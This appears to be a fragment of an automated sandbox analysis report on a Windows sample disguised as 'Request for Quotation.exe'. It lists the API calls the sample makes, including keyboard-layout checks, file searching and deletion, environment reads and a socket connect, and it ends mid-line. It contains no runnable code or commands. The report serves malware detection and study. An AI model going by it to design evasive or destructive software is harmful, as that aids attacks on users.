          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh1_2_00405156
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh1_2_00405156
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh1_1_00405156
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh1_1_00405156
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A15
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_004065C1 FindFirstFileA,FindClose,0_2_004065C1
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_2_00404C0A
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_2_0040751B
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr1_2_00410586
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_2_0040728F
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE1_2_0040477E
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_2_00403325
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,1_2_00412BEE
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_1_00404C0A
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_1_0040751B
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?A